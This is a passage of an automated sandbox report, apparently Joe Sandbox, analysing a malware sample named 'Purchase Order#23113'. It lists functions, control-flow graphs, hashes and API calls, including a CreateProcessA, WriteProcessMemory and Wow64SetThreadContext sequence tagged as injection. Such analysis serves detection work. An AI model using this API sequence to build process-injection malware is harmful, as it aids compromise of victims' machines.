5b663d9 call 5b6a368 789->792 793 5b663d9 call 5b6a358 789->793 790 5b663df-5b6640a 790->753 792->790 793->790 794->756 795->756 796->758 797->758 798->759 799->759 800->774 801->774 803->763 804->763
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q
                                                                            • API String ID: 0-355816377
                                                                            • Opcode ID: 19c00c1b6927cfcd55e7067bdfacbbf6f23f336ce53568fdd345d7cf0be144b5
                                                                            • Instruction ID: 067ae97d8b7c03ec2ddb86566819d3179d5504cdcd8ebb342cbbeb4c6088cea3
                                                                            • Opcode Fuzzy Hash: 19c00c1b6927cfcd55e7067bdfacbbf6f23f336ce53568fdd345d7cf0be144b5
                                                                            • Instruction Fuzzy Hash: 72B1E774E10219CFDB64CFA9D944BADBBB6FB88300F2085AAD409A7358DB346D85CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6618B Relevance: 2.7, Strings: 2, Instructions: 199COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 805 5b6618b-5b661a0 807 5b661a3 805->807 808 5b661aa-5b661c6 807->808 809 5b661d8-5b661d9 808->809 810 5b661c8 808->810 814 5b66533-5b6653a 809->814 810->807 810->809 811 5b662e4-5b662f7 810->811 812 5b662b2-5b662b5 810->812 813 5b66512-5b66515 call 5b6d938 810->813 810->814 815 5b661de-5b6624f 810->815 816 5b6643e-5b664c8 810->816 817 5b6640f 810->817 818 5b662fc 810->818 819 5b6631b-5b66323 810->819 811->808 856 5b662b8 call 5b6a730 812->856 857 5b662b8 call 5b6a740 812->857 825 5b6651b-5b6652e 813->825 864 5b66255 call 5b6a368 815->864 865 5b66255 call 5b6a358 815->865 839 5b664f2 816->839 840 5b664ca-5b664d6 816->840 866 5b66412 call 5b679c0 817->866 867 5b66412 call 5b679b1 817->867 860 5b662fe call 7fb8fcf 818->860 861 5b662fe call 7fb8fe0 818->861 862 5b66328 call 5b6c020 819->862 863 5b66328 call 5b6c010 819->863 820 5b66304-5b66316 820->808 821 5b6632e-5b663d3 858 5b663d9 call 5b6a368 821->858 859 5b663d9 call 5b6a358 821->859 822 5b66418-5b66439 825->808 826 5b662be-5b662df 826->808 837 5b6625b-5b66268 841 5b66292 837->841 842 5b6626a-5b66276 837->842 847 5b664f8-5b6650d 839->847 843 5b664e0-5b664e6 840->843 844 5b664d8-5b664de 840->844 848 5b66298-5b662ad 841->848 845 5b66280-5b66286 842->845 846 5b66278-5b6627e 842->846 850 5b664f0 843->850 844->850 851 5b66290 845->851 846->851 847->808 850->847 851->848 853 5b663df-5b6640a 853->808 856->826 857->826 858->853 859->853 860->820 861->820 862->821 863->821 864->837 865->837 866->822 867->822
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q
                                                                            • API String ID: 0-355816377
                                                                            • Opcode ID: a1eacc2d97fa9b73bb8e34e3287a0d3eaa6ef24acc6ed2d5c0d1e2ba93d31cd4
                                                                            • Instruction ID: a136f4789c931b1a05302aa4c040ac2a19d6e11289a1129775fe2cf3fe5497f6
                                                                            • Opcode Fuzzy Hash: a1eacc2d97fa9b73bb8e34e3287a0d3eaa6ef24acc6ed2d5c0d1e2ba93d31cd4
                                                                            • Instruction Fuzzy Hash: 75A1B574E10219CFDB64CFA5D948B9DBBB6BF88300F1085AAD80AA7358DB346D85CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FBA458 Relevance: .6, Instructions: 630COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dea2db7dc24f68184993e98726ab4d9cd0aa851d643ed542c9fc55c8eefc8b71
                                                                            • Instruction ID: 4511cc4dc913032f7a05ef9bfa4f857323484ae066678d5a0c2228bb4774ba3f
                                                                            • Opcode Fuzzy Hash: dea2db7dc24f68184993e98726ab4d9cd0aa851d643ed542c9fc55c8eefc8b71
                                                                            • Instruction Fuzzy Hash: B432BEB4B012059FDB29DB7AC950BAEB7F6AF89300F68846DD4059B7A1DB34EC01CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6C020 Relevance: .2, Instructions: 204COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 84c6eddee06a6bbb06fd82d87ec73ff0e39695055c144277599a058eeefdab5d
                                                                            • Instruction ID: ad31177684735feedbb4ac819ca0d93b7df52d419e7adab6d307d0e544ec22f2
                                                                            • Opcode Fuzzy Hash: 84c6eddee06a6bbb06fd82d87ec73ff0e39695055c144277599a058eeefdab5d
                                                                            • Instruction Fuzzy Hash: 5B81E375D05209DFDF08CFA6D4849AEFFB2EB89310F10D46AE416AB224DB34A941CF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6C010 Relevance: .2, Instructions: 201COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f0f738d7ec9d9a8e17e65e4bdc3a14548e5a4f4a2e53337bc25aefd4f1abaf5f
                                                                            • Instruction ID: e665eccd4eef21339c8d9b4882b386bbb9ba4d88bb4c3482f6eb851f0d0d92f2
                                                                            • Opcode Fuzzy Hash: f0f738d7ec9d9a8e17e65e4bdc3a14548e5a4f4a2e53337bc25aefd4f1abaf5f
                                                                            • Instruction Fuzzy Hash: 5381F575D05209DFDF08CFA5D4849AEFFB2EF89310F10D46AE456AB264DB34A9418F44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0142D030 Relevance: 6.1, APIs: 4, Instructions: 137threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 423 142d030-142d032 424 142d034 423->424 425 142d035-142d03a 423->425 424->425 426 142d03c 425->426 427 142d03d-142d0cf GetCurrentProcess 425->427 426->427 431 142d0d1-142d0d7 427->431 432 142d0d8-142d10c GetCurrentThread 427->432 431->432 433 142d115-142d149 GetCurrentProcess 432->433 434 142d10e-142d114 432->434 435 142d152-142d16d call 142d618 433->435 436 142d14b-142d151 433->436 434->433 440 142d173-142d1a2 GetCurrentThreadId 435->440 436->435 441 142d1a4-142d1aa 440->441 442 142d1ab-142d20d 440->442 441->442
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 0142D0BE
                                                                            • GetCurrentThread.KERNEL32 ref: 0142D0FB
                                                                            • GetCurrentProcess.KERNEL32 ref: 0142D138
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0142D191
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: 32775c8bb6adf5e03a40016813c2a8478edb06cc1649875b60e79b06b79c805f
                                                                            • Instruction ID: a18a191abdcf623145c09ec1a1ceecead8d080c3348e6af4e2c696eff593e6bb
                                                                            • Opcode Fuzzy Hash: 32775c8bb6adf5e03a40016813c2a8478edb06cc1649875b60e79b06b79c805f
                                                                            • Instruction Fuzzy Hash: FD5166B09042498FDB18CFA9D548BEEBFF1BF48318F24846AD059A7360C7349885CB66
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0142D040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 449 142d040-142d0cf GetCurrentProcess 453 142d0d1-142d0d7 449->453 454 142d0d8-142d10c GetCurrentThread 449->454 453->454 455 142d115-142d149 GetCurrentProcess 454->455 456 142d10e-142d114 454->456 457 142d152-142d16d call 142d618 455->457 458 142d14b-142d151 455->458 456->455 462 142d173-142d1a2 GetCurrentThreadId 457->462 458->457 463 142d1a4-142d1aa 462->463 464 142d1ab-142d20d 462->464 463->464
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 0142D0BE
                                                                            • GetCurrentThread.KERNEL32 ref: 0142D0FB
                                                                            • GetCurrentProcess.KERNEL32 ref: 0142D138
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0142D191
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: 7a88504fa63295e305ce4fde71511ad1bfd9f2b86efaab52b7934b10d062eada
                                                                            • Instruction ID: 6fc7e3f3c097a3d81747313e7c5400d18ad24a9481c8f6144ccd1979ffeb6653
                                                                            • Opcode Fuzzy Hash: 7a88504fa63295e305ce4fde71511ad1bfd9f2b86efaab52b7934b10d062eada
                                                                            • Instruction Fuzzy Hash: 4C5135B09002098FDB14DFA9D548BEEBBF1BF48314F20C42AE519A7364D734A984CB65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B679C0 Relevance: 2.6, Strings: 2, Instructions: 50COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 966 5b679c0-5b679d8 967 5b679df-5b679e9 966->967 968 5b679da 966->968 969 5b679ea 967->969 968->967 970 5b679f1-5b67a0d 969->970 971 5b67a16-5b67a17 970->971 972 5b67a0f 970->972 973 5b67a53-5b67a59 971->973 975 5b67a19 971->975 972->969 972->973 974 5b67a3f-5b67a51 972->974 972->975 974->970 977 5b67a1c call 5b67a80 975->977 978 5b67a1c call 5b67a70 975->978 976 5b67a22-5b67a3d 976->970 977->976 978->976
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ~Q`j$c!
                                                                            • API String ID: 0-956487369
                                                                            • Opcode ID: 1a56cad3948e5abd4abd1b591555084b256f5ae99c3337f0daa410e4897150d6
                                                                            • Instruction ID: 24b9cb16e421ebb1ae71b9f25974881f54f2e9787c6881bb98cff38a9230ab08
                                                                            • Opcode Fuzzy Hash: 1a56cad3948e5abd4abd1b591555084b256f5ae99c3337f0daa410e4897150d6
                                                                            • Instruction Fuzzy Hash: E91142B4E15109DBCB44CFA9C54159DBBF2FB84204F10D5A5D405A3350EB74AB40CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B679B1 Relevance: 2.5, Strings: 2, Instructions: 49COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 979 5b679b1-5b679d8 980 5b679df-5b679e9 979->980 981 5b679da 979->981 982 5b679ea 980->982 981->980 983 5b679f1-5b67a0d 982->983 984 5b67a16-5b67a17 983->984 985 5b67a0f 983->985 986 5b67a53-5b67a59 984->986 988 5b67a19 984->988 985->982 985->986 987 5b67a3f-5b67a51 985->987 985->988 987->983 990 5b67a1c call 5b67a80 988->990 991 5b67a1c call 5b67a70 988->991 989 5b67a22-5b67a3d 989->983 990->989 991->989
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ~Q`j$c!
                                                                            • API String ID: 0-956487369
                                                                            • Opcode ID: 56608ca8df6e2832bc667fea0551962a46ce45e3be0c0e354a35cc63f3ad02b0
                                                                            • Instruction ID: ee7140cfe85b415f85172316fd527e213a4bb722f4de27bfe24c2bfdd27e2e64
                                                                            • Opcode Fuzzy Hash: 56608ca8df6e2832bc667fea0551962a46ce45e3be0c0e354a35cc63f3ad02b0
                                                                            • Instruction Fuzzy Hash: 34116D74E15209DBCB04CFA8C98169DBBF2FB85214F24C6AAD415A3350DB34AB41CB44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB707D Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 992 7fb707d-7fb711d 994 7fb711f-7fb7129 992->994 995 7fb7156-7fb7176 992->995 994->995 996 7fb712b-7fb712d 994->996 1000 7fb7178-7fb7182 995->1000 1001 7fb71af-7fb71de 995->1001 998 7fb712f-7fb7139 996->998 999 7fb7150-7fb7153 996->999 1002 7fb713b 998->1002 1003 7fb713d-7fb714c 998->1003 999->995 1000->1001 1005 7fb7184-7fb7186 1000->1005 1011 7fb71e0-7fb71ea 1001->1011 1012 7fb7217-7fb72d1 CreateProcessA 1001->1012 1002->1003 1003->1003 1004 7fb714e 1003->1004 1004->999 1006 7fb71a9-7fb71ac 1005->1006 1007 7fb7188-7fb7192 1005->1007 1006->1001 1009 7fb7196-7fb71a5 1007->1009 1010 7fb7194 1007->1010 1009->1009 1014 7fb71a7 1009->1014 1010->1009 1011->1012 1013 7fb71ec-7fb71ee 1011->1013 1023 7fb72da-7fb7360 1012->1023 1024 7fb72d3-7fb72d9 1012->1024 1015 7fb7211-7fb7214 1013->1015 1016 7fb71f0-7fb71fa 1013->1016 1014->1006 1015->1012 1018 7fb71fe-7fb720d 1016->1018 1019 7fb71fc 1016->1019 1018->1018 1020 7fb720f 1018->1020 1019->1018 1020->1015 1034 7fb7362-7fb7366 1023->1034 1035 7fb7370-7fb7374 1023->1035 1024->1023 1034->1035 1036 7fb7368 1034->1036 1037 7fb7376-7fb737a 1035->1037 1038 7fb7384-7fb7388 1035->1038 1036->1035 1037->1038 1039 7fb737c 1037->1039 1040 7fb738a-7fb738e 1038->1040 1041 7fb7398-7fb739c 1038->1041 1039->1038 1040->1041 1042 7fb7390 1040->1042 1043 7fb73ae-7fb73b5 1041->1043 1044 7fb739e-7fb73a4 1041->1044 1042->1041 1045 7fb73cc 1043->1045 1046 7fb73b7-7fb73c6 1043->1046 1044->1043 1048 7fb73cd 1045->1048 1046->1045 1048->1048
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07FB72BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 64000b4e529a4c23d5b81e894c3f7aa2c99f3c497c4ae85c81ba1ff43713bfd8
                                                                            • Instruction ID: add4173c8d4aa02ac0415c008caa0f15a9eb313ec8aabe6d8e6c916935967ca0
                                                                            • Opcode Fuzzy Hash: 64000b4e529a4c23d5b81e894c3f7aa2c99f3c497c4ae85c81ba1ff43713bfd8
                                                                            • Instruction Fuzzy Hash: 31A151B1D0021ACFDB24DF69C841BDDBBF2BF84314F1885AAD849A7250D7749985CFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB7088 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07FB72BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: cb0cec207c09672643ea814e6d6e28c5ddd19cc26d9d617ad7f3b8894fd6473c
                                                                            • Instruction ID: d1cf1f362af9301141a15c6a9478c06ce7a19c93f69d4f3e05e5fde8b3e89c17
                                                                            • Opcode Fuzzy Hash: cb0cec207c09672643ea814e6d6e28c5ddd19cc26d9d617ad7f3b8894fd6473c
                                                                            • Instruction Fuzzy Hash: 5D915FB1D0021ADFDB24DF69C841BDDBBF2BF84314F1885AAE809A7250D7749985CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0142ADA8 Relevance: 1.7, APIs: 1, Instructions: 212COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0142AFFE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: fcd1cb8358ffe5756ed2e57eb98571ac585f0e587beaa0104b1b9c14b9f60272
                                                                            • Instruction ID: c53db94dc51041e486ac31942cb7569e0de6343a0066fa00a88320b6f058c9d7
                                                                            • Opcode Fuzzy Hash: fcd1cb8358ffe5756ed2e57eb98571ac585f0e587beaa0104b1b9c14b9f60272
                                                                            • Instruction Fuzzy Hash: 13814670A00B158FD724DF6AC44479ABBF1FF48214F10892ED986D7B60D775E88ACB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0142590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 014259C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 88d5691d8e6bcc34c3de89e806e23579017f8acd6e1553c07023c247edf7ded0
                                                                            • Instruction ID: dffcb1680c1f4e847e9cd79754ff0810275ed72cf42c2adcce0a7353073b4234
                                                                            • Opcode Fuzzy Hash: 88d5691d8e6bcc34c3de89e806e23579017f8acd6e1553c07023c247edf7ded0
                                                                            • Instruction Fuzzy Hash: E441F4B0D00729CFDB24DFA9C884BCEBBB5BF49304F60815AD408AB265DB756985CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 014244C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 014259C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 55a1aecc936b31622b27f629fb7e7930b6b43250f8449f08be366a30a9a092a2
                                                                            • Instruction ID: 4333a6a7a2f893f959b7153f9826f9c7deff32b78ee255972ce9604b29a928b3
                                                                            • Opcode Fuzzy Hash: 55a1aecc936b31622b27f629fb7e7930b6b43250f8449f08be366a30a9a092a2
                                                                            • Instruction Fuzzy Hash: B141F4B0D00729CBDB24CFA9C844BDEBBB5BF49304F60816AD408AB265DB755985CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB6E00 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07FB6E90
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 6abf8f2c9f726864fd937a703f7b156c1b740618837341613a496d7fefa1a9c2
                                                                            • Instruction ID: b6e5f18d1205e56d299fbf68fd0a34b34e9afd7371ef2294bc29b966ceba87f2
                                                                            • Opcode Fuzzy Hash: 6abf8f2c9f726864fd937a703f7b156c1b740618837341613a496d7fefa1a9c2
                                                                            • Instruction Fuzzy Hash: 6D2124B19003599FCB10CFAAC885BDEBBF5FF48310F14842AE958A7250C779A954CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB6E02 Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07FB6E90
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 2d0bc43ae5e51f9e960fffa1bff434246968fafabe6e5902f837ad5296db8141
                                                                            • Instruction ID: 0260313e195d83673617e0fe292edccc3ede17f816e91ab94fdd05232572c311
                                                                            • Opcode Fuzzy Hash: 2d0bc43ae5e51f9e960fffa1bff434246968fafabe6e5902f837ad5296db8141
                                                                            • Instruction Fuzzy Hash: 662125B1900259DFCF10CFAAC884BEEBBF1FF48310F14842AE958A7250C7799954CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB6C61 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07FB6CE6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: b468520550a8c07b141297096e81c7ab53873248cc5e2f89d08cdb3504b743af
                                                                            • Instruction ID: 6f8fa3befd8187b9d85ed6a9ee67a6d7a759730993bd9be3feefaf7461e22e8b
                                                                            • Opcode Fuzzy Hash: b468520550a8c07b141297096e81c7ab53873248cc5e2f89d08cdb3504b743af
                                                                            • Instruction Fuzzy Hash: 762139B1D002098FDB20DFAAC484BEEBBF4EF89324F148529D459A7291C7789545CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB6EF0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07FB6F70
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 9cb063b07ff85175a5b59fd60a4b4da96e67c1a420b3531fa00c767ed932c935
                                                                            • Instruction ID: 14b9a9354873c0ac7ebada37f419b14f5f35f29e03722e47eb867889693870b8
                                                                            • Opcode Fuzzy Hash: 9cb063b07ff85175a5b59fd60a4b4da96e67c1a420b3531fa00c767ed932c935
                                                                            • Instruction Fuzzy Hash: AC2128B1D002599FCB10DFAAC840AEEFBF5FF48310F108429E558A7250D738A544CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB6C68 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07FB6CE6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: cf7ab54d20910c8b847d630c5f9d2fcd2c4c8cadcea2e4de197a0f0e2f871e68
                                                                            • Instruction ID: b85670d845151fb82ed07278dd062ea37901f84090b0c286588416e94019f511
                                                                            • Opcode Fuzzy Hash: cf7ab54d20910c8b847d630c5f9d2fcd2c4c8cadcea2e4de197a0f0e2f871e68
                                                                            • Instruction Fuzzy Hash: EE2118B1D002098FDB10DFAAC485BEEBBF4EF48324F148429D459A7241CB78A945CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0142D689 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0142D717
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: ac4e3b577e2084cbec4ac3008784f4586e40135676ea6f0609c6084e0e5df721
                                                                            • Instruction ID: fca2700eda6ee865ced87c7754dd9dca50be769e6d50cdc697e58849d07cb482
                                                                            • Opcode Fuzzy Hash: ac4e3b577e2084cbec4ac3008784f4586e40135676ea6f0609c6084e0e5df721
                                                                            • Instruction Fuzzy Hash: 9C21E0B5D00258DFDB10CFA9D984ADEBBF4EB48324F14841AE918B7320C378A940CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0142D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0142D717
                                                                            Memory Dump Source
